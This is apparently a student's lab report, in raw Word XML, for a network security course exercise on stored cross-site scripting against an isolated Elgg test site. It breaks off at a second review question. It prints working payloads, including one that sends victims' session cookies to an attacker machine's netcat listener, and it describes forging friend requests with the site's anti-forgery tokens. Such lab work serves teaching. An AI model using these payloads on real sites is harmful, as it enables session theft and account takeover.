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A33" w:rsidRPr="000C28DF" w:rsidRDefault="00D30BB6" w:rsidP="000C28DF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">50.020 Network Security Lab 7: </w:t>
      </w:r>
      <w:r w:rsidR="0097670E" w:rsidRPr="0097670E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS) Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D30BB6" w:rsidRDefault="00D30BB6" w:rsidP="00D30BB6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 1: </w:t>
      </w:r>
      <w:r w:rsidR="0097670E" w:rsidRPr="0097670E">
        <w:t>Posting a Malicious Message to Display an Alert Window</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F67088" w:rsidRDefault="00F67088"/>
    <w:p w:rsidR="00F67088" w:rsidRDefault="00F67088">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>IP Address Setup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F67088" w:rsidRDefault="00F67088">
      <w:r>
        <w:t xml:space="preserve">Elgg Server: </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>10.0.2.128</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F67088" w:rsidRDefault="00F67088">
      <w:r>
        <w:t xml:space="preserve">Samy’s Machine: </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>10.0.2.129</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F67088" w:rsidRDefault="00F67088">
      <w:r>
        <w:t xml:space="preserve">Alice’s Machine: </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>10.0.2.130</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00243B61" w:rsidRDefault="00243B61"/>
    <w:p w:rsidR="00243B61" w:rsidRDefault="00243B61">
      <w:r>
        <w:t>Note: We edit Samy’s and Alice’s /etc/hosts file to reflect the IP address of  www.xsslabelgg.com</w:t>
      </w:r>
      <w:r w:rsidR="00FF61CF">
        <w:t xml:space="preserve"> to be 10.0.2.128:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF61CF" w:rsidRPr="00F67088" w:rsidRDefault="00FF61CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A549706" wp14:editId="633BA3A9">
            <wp:extent cx="3035306" cy="4393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4694" cy="445089"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004046FA" w:rsidRDefault="004046FA">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00064189" w:rsidRDefault="00064189">
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Modifying Samy’s Profile Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53D51" w:rsidRDefault="00F53D51">
      <w:r>
        <w:t>First, we log in as Samy</w:t>
      </w:r>
      <w:r w:rsidR="004046FA">
        <w:t xml:space="preserve"> on Samy’s Machine </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00903892">
        <w:t xml:space="preserve">edit </w:t>
      </w:r>
      <w:r>
        <w:t>his user profile</w:t>
      </w:r>
      <w:r w:rsidR="00903892">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="00F52995">
        <w:t xml:space="preserve"> key in the code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F52995" w:rsidRPr="00C401B8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(“ALERT FROM SAMY”);&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00C401B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">into his </w:t>
      </w:r>
      <w:r w:rsidR="008626EC">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00F52995">
        <w:t>Brief Description</w:t>
      </w:r>
      <w:r w:rsidR="008626EC">
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidR="00F52995">
        <w:t>attribute</w:t>
      </w:r>
      <w:r w:rsidR="008626EC">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903892" w:rsidRDefault="00F52995">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E68972A" wp14:editId="63C503D5">
            <wp:extent cx="5158970" cy="3580411"/>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7227" cy="3600022"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52995" w:rsidRDefault="00C401B8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>After this is saved and we are returned to Samy’s profile description page, an alert message pops up saying “ALERT FROM SAMY”:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C401B8" w:rsidRDefault="00C401B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07C636D1" wp14:editId="5A0E63D1">
            <wp:extent cx="4714504" cy="289418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9571" cy="2909570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED427E" w:rsidRDefault="00064189">
      <w:r>
        <w:t xml:space="preserve">To confirm that this works from other user’s point of view, we log into Alice’s </w:t>
      </w:r>
      <w:r w:rsidR="00ED427E">
        <w:t>account</w:t>
      </w:r>
      <w:r w:rsidR="00903892">
        <w:t xml:space="preserve"> on Alice’s machine </w:t>
      </w:r>
      <w:r w:rsidR="00ED427E">
        <w:t>and view Samy’s profile:</w:t>
      </w:r>
      <w:r w:rsidR="00ED427E">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00ED427E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17A69488" wp14:editId="510AA841">
            <wp:extent cx="4904509" cy="382038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0040" cy="3824691"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45705" w:rsidRDefault="00ED427E">
      <w:r>
        <w:t>We confirm that the alert window is displayed when another user views our (Samy’s) profile.</w:t>
      </w:r>
      <w:r w:rsidR="00F45705">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45705" w:rsidRDefault="00F45705" w:rsidP="00F45705">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>ask 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0097670E">
        <w:t xml:space="preserve">Posting a Malicious Message to Display </w:t>
      </w:r>
      <w:r>
        <w:t>Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45705" w:rsidRDefault="00F45705" w:rsidP="00F45705"/>
    <w:p w:rsidR="00F942AF" w:rsidRDefault="00903892" w:rsidP="00F942AF">
      <w:r>
        <w:t>On Samy’s machine, we</w:t>
      </w:r>
      <w:r w:rsidR="00F942AF">
        <w:t xml:space="preserve"> edit his profile again. This time, we modify his ‘Brief Description’ slightly to have the alert contents to be document.cookie instead of a malicious text. The code we key in is </w:t>
      </w:r>
      <w:r w:rsidR="00F942AF" w:rsidRPr="00C401B8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:r w:rsidR="007C346B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r w:rsidR="00F942AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00F942AF" w:rsidRPr="00C401B8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>;&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00F942AF">
        <w:t xml:space="preserve"> as shown</w:t>
      </w:r>
      <w:r w:rsidR="00F942AF">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45705" w:rsidRPr="00F45705" w:rsidRDefault="005A5084" w:rsidP="00F45705">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41275D1C" wp14:editId="0FC0A61D">
            <wp:extent cx="4411683" cy="3139554"/>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509" cy="3144411"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A5084" w:rsidRDefault="005A5084" w:rsidP="005A5084">
      <w:r>
        <w:t xml:space="preserve">After this is saved and we are returned to Samy’s profile description page, an alert message pops up </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">showing the cookie attached to Samy’s session, which is </w:t>
      </w:r>
      <w:r w:rsidR="00F96DF1" w:rsidRPr="00F96DF1">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>3ph6stpk2so8j9r3gvg08eka57</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008626EC" w:rsidRDefault="00F96DF1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AD94518" wp14:editId="4D687A13">
            <wp:extent cx="4928260" cy="318546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0154" cy="3193156"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A5084" w:rsidRDefault="005A5084" w:rsidP="005A5084">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>To confirm that this works from other user’s point of view,</w:t>
      </w:r>
      <w:r w:rsidR="00F22DF8">
        <w:t xml:space="preserve"> we go to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Alice’s </w:t>
      </w:r>
      <w:r w:rsidR="00F22DF8">
        <w:t>machine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and view Samy’s profile</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A5084" w:rsidRDefault="004D0B66">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52330DF1" wp14:editId="0B034585">
            <wp:extent cx="5272644" cy="393138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5584" cy="3933579"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A5084" w:rsidRDefault="005A5084">
      <w:r>
        <w:t xml:space="preserve">In this case, Alice’s </w:t>
      </w:r>
      <w:r w:rsidR="00F96DF1">
        <w:t xml:space="preserve">session </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cookie, which is </w:t>
      </w:r>
      <w:r w:rsidR="00F96DF1" w:rsidRPr="00F96DF1">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>dhnj71o1gm7itmji6pjvujm190</w:t>
      </w:r>
      <w:r w:rsidR="009B6558">
        <w:t>, is displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C2A4B" w:rsidRDefault="001C2A4B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F67088" w:rsidRDefault="00F67088" w:rsidP="00F67088">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>ask 3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>Stealing Cookies from the Victim’s Machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F67088" w:rsidRDefault="00F67088"/>
    <w:p w:rsidR="00221E45" w:rsidRDefault="00221E45">
      <w:r>
        <w:t>On Samy’s machine, we set up a netcat listener using the command nc -l 5555 -v:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00221E45" w:rsidRDefault="00221E45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BA5E91C" wp14:editId="34073277">
            <wp:extent cx="4346369" cy="482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453" cy="488273"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B30C2F" w:rsidRDefault="00B30C2F" w:rsidP="00B30C2F">
      <w:r>
        <w:t>On Samy’s machine, we edit his profile again. This time, we modify his ‘Brief Description’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r>
        <w:t>write document.cookie as a HTTP GET query parameter to Samy’s netcat listener</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The code we key in is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.write</w:t>
      </w:r>
      <w:r w:rsidRPr="00C401B8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>‘&lt;img src=http://10.0.2.129:5555?c=’ + escape(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>) + ‘&gt;’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C401B8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>;&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as shown:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00221E45" w:rsidRDefault="00B30C2F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F121474" wp14:editId="753DEAF7">
            <wp:extent cx="5308270" cy="372032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2500" cy="3723290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B30C2F" w:rsidRDefault="00B30C2F" w:rsidP="00B30C2F">
      <w:r>
        <w:t xml:space="preserve">After this is saved and we are returned to Samy’s profile description page, </w:t>
      </w:r>
      <w:r>
        <w:t>the HTTP GET request with Samy’s session cookie is captured on the netcat listener as shown</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B30C2F" w:rsidRDefault="00B30C2F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69D03A14" wp14:editId="107264C1">
            <wp:extent cx="5355771" cy="16244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3995" cy="1626963"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009956B0" w:rsidRDefault="009956B0" w:rsidP="009956B0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>To confirm that this works from other user’s point of view, we go to Alice’s machine and view Samy’s profile</w:t>
      </w:r>
      <w:r w:rsidR="00876EBD">
        <w:t>. The following HTTP GET request is seen on Samy’s netcat listener</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009956B0" w:rsidRDefault="00876EBD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F01AE72" wp14:editId="0575F033">
            <wp:extent cx="5943600" cy="1484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4630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00554CBB" w:rsidRDefault="00554CBB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00554CBB" w:rsidRDefault="00554CBB" w:rsidP="00554CBB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>ask 4: Becoming the Victim’s Friend</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876EBD" w:rsidRDefault="00876EBD"/>
    <w:p w:rsidR="006C19AA" w:rsidRDefault="006C19AA">
      <w:r>
        <w:t>Let’s assume that Charlie is an account that Samy created to carry out investigations. We log into Charlie’s account on Samy’s machine and attempt to add Samy as a friend by viewing his profile and clicking the Add Friend Button.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C19AA" w:rsidRDefault="006C19AA">
      <w:r>
        <w:t>The following get request is captured on the HTTP Header Live and is enlarged to see the whole URL:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A1FF041" wp14:editId="049466EF">
            <wp:extent cx="5943600" cy="12719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71905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C19AA" w:rsidRDefault="00291849">
      <w:r>
        <w:t>The URL consists of the following query parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291849" w:rsidRDefault="00291849" w:rsidP="00291849">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>friend</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291849" w:rsidRDefault="00291849" w:rsidP="00291849">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>__elgg_ts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291849" w:rsidRDefault="00291849" w:rsidP="00291849">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>__elgg_token</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291849" w:rsidRDefault="004E0B62" w:rsidP="00291849">
      <w:r>
        <w:t xml:space="preserve">We log in back to Samy’s account and edit his ‘About Me’ info in ‘Edit HTML’ mode. Refer to </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96E3C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>add_friend.</w:t>
      </w:r>
      <w:r w:rsidR="00763BE3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidR="00865877">
        <w:t xml:space="preserve"> to view the </w:t>
      </w:r>
      <w:r>
        <w:t>HTML code that is keyed in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E0B62" w:rsidRDefault="0078230F" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06ED27F8" wp14:editId="6F8C9ACA">
            <wp:extent cx="5164434" cy="3906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5780" cy="3915566"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078230F" w:rsidRDefault="0078230F" w:rsidP="0078230F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">After this is saved, </w:t>
      </w:r>
      <w:r>
        <w:t>we see that Samy has added himself as a friend on the Activity page:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078230F" w:rsidRDefault="0078230F" w:rsidP="0078230F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3688A1E6" wp14:editId="799E93F2">
            <wp:extent cx="5186497" cy="25472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11" cy="2554189"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E0B62" w:rsidRDefault="0078230F" w:rsidP="00291849">
      <w:r>
        <w:t>as well as his Friends page:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078230F" w:rsidRDefault="0078230F" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3117768B" wp14:editId="4342929B">
            <wp:extent cx="4168239" cy="64972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8102" cy="657501"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078230F" w:rsidRDefault="0078230F" w:rsidP="0078230F">
      <w:r>
        <w:t>To confirm that this works from other user’s point of view, we go to Alice’s machine and view Samy’s profile.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> We see that Alice has added Samy as a friend on the Activity page</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078230F" w:rsidRDefault="0078230F" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C574BDE" wp14:editId="60E1D578">
            <wp:extent cx="5089593" cy="266007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2886" cy="2672247"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078230F" w:rsidRDefault="0078230F" w:rsidP="00291849">
      <w:r>
        <w:t>as well as her Friends page:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00081932" w:rsidRDefault="0078230F" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74907056" wp14:editId="2835F289">
            <wp:extent cx="2511631" cy="609888"/>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5980" cy="620657"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00452A0C" w:rsidRDefault="00452A0C" w:rsidP="00291849">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Questions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00452A0C" w:rsidRDefault="00452A0C" w:rsidP="00291849">
      <w:r w:rsidRPr="00452A0C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Q1</w:t>
      </w:r>
      <w:r>
        <w:t>: Explain the purpose of Lines (1) and (2), why are they needed?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00452A0C" w:rsidRDefault="00452A0C" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ans</w:t>
      </w:r>
      <w:r>
        <w:t>: Lines (1) and (2) helps to determine the timestamp and token respectively. These values are implemented by the Elgg server to prevent cross-site request forgery (CSRF) attacks. In cross-site scripting (XSS), these can be worked around because the victim’s browser will be able to determine these security tokens and we can attach them in the HTTP requests themselves.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB522E" w:rsidRDefault="00CB522E" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Q2</w:t>
      </w:r>
      <w:r>
